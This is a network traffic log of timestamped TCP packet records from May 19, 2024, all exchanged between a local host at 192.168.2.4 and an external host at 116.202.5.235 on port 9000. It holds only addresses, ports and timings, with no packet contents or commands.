May 19, 2024 09:09:08.602926970 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.602961063 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.602972984 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.602994919 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.603003979 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.603030920 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.603708029 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.603740931 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.603755951 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.603774071 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.603780985 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.603810072 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.603821993 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.603854895 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.604502916 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.604537010 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.604551077 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.604571104 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.604583025 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.604604959 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.604613066 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.604648113 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.605304956 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.605338097 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.605355024 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.605370998 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.605389118 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.605415106 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.606101990 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.606136084 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.606148958 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.606168985 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.606180906 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.606211901 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.606936932 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.606967926 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.606986046 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.606992960 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.607004881 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.607023954 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.607023954 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.607043982 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.607635975 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.607652903 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.607666969 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.607686996 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.607687950 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.607721090 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.608411074 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.608427048 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.608442068 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.608469009 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.608499050 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.609210968 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.609226942 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.609240055 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.609256983 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.609263897 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.609297037 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.610055923 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.610071898 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.610085011 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.610107899 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.610132933 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.610780954 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.610799074 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.610815048 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.610830069 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.610835075 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.610863924 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.610888958 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.611520052 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.611536026 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.611550093 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.611579895 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.611596107 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.612287998 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.612304926 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.612318039 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.612334967 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.612345934 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.612365007 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.612374067 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.613039017 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.613054991 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.613069057 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.613090038 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.613090992 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.613110065 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.613111019 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.613140106 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.613162994 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.614026070 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.614042044 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.614058018 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.614077091 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.614078045 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.614088058 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.614109993 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.614126921 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.614928961 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.614944935 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.614958048 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.614974022 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.614994049 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.615024090 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.615489006 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.615514994 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.615531921 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.615531921 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.615555048 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.615569115 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.616126060 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.616182089 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.618304968 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.618321896 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.618335009 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.618360043 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.618371964 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.618381977 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.618570089 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.618592978 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.618634939 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.619083881 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.619101048 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.619155884 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.619187117 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.619282961 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.619370937 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.619443893 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.619622946 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.619637966 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.619663954 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.619679928 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.621463060 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.621479988 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.621525049 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.623099089 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.623168945 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.623189926 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.623205900 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.623234034 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.623250961 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.624356985 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.624411106 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.626707077 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.626751900 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.626780987 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.626821995 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.627326012 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.627413988 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.627429962 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.627465010 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.627496958 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.627612114 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.627666950 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.627804041 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.627896070 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.629091024 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.629152060 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.646642923 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.646656990 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.646725893 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.646725893 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.646816015 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.646868944 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.647099018 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.647120953 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.647139072 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.647145987 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.647176981 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.647176981 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.647859097 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.647876024 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.647891998 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.647907972 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.647944927 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.647944927 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.648581982 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.648598909 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.648612022 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.648633003 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.648636103 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.648653030 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.648655891 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.648685932 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.649553061 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.649568081 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.649581909 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.649606943 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.649642944 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.650264978 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.650280952 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.650317907 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.650350094 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.650789976 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.650805950 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.650819063 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.650836945 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.650846958 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.650855064 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.650868893 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.650892973 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.651782990 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.651798964 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.651813030 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.651829958 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.651830912 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.651849031 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.651882887 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.652755022 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.652770042 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.652784109 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.652805090 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.652807951 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.652823925 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.652827024 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.652844906 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.652854919 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.652879000 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.652913094 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.653770924 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.653784990 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.653800011 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.653815985 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.653817892 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.653836966 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.653872013 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.653872013 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.654597044 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.654612064 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.654627085 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.654642105 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.654655933 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.654673100 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.654686928 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.654687881 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.654720068 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.654747963 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.655534983 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.655550003 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.655564070 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.655580997 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.655595064 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.655595064 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.655612946 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.655616999 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.655630112 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.655643940 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.655661106 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.655692101 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.656562090 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.656578064 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.656590939 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.656605959 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.656621933 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.656625986 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.656639099 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.656656981 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.656656981 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.656687021 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.656721115 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.657490015 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.657505989 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.657517910 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.657531977 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.657551050 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.657556057 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.657568932 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.657579899 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.657598019 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.657629967 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.657629967 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.657665968 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.658468008 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.658484936 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.658498049 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.658515930 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.658520937 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.658536911 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.658539057 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.658552885 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.658562899 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.658574104 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.658588886 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.658591986 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.658613920 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.658636093 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.659439087 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.659456015 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.659470081 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.659485102 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.659501076 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.659502983 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.659522057 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.659528017 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.659544945 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.659569025 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.660424948 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.660439968 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.660454035 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.660473108 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.660481930 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.660494089 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.660494089 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.660516024 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.660520077 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.660528898 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.660557985 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.661429882 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.661444902 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.661458015 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.661477089 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.661478996 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.661489010 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.661495924 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.661511898 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.661528111 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.661554098 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.662282944 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.662298918 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.662312984 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.662332058 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.662331104 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.662344933 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.662350893 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.662369967 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.662374973 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.662384987 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.662399054 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.662409067 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.662441015 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.663177967 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.663193941 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.663207054 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.663224936 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.663239956 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.663244963 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.663258076 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.663259029 CEST	9000	49750	116.202.5.235	192.168.2.4
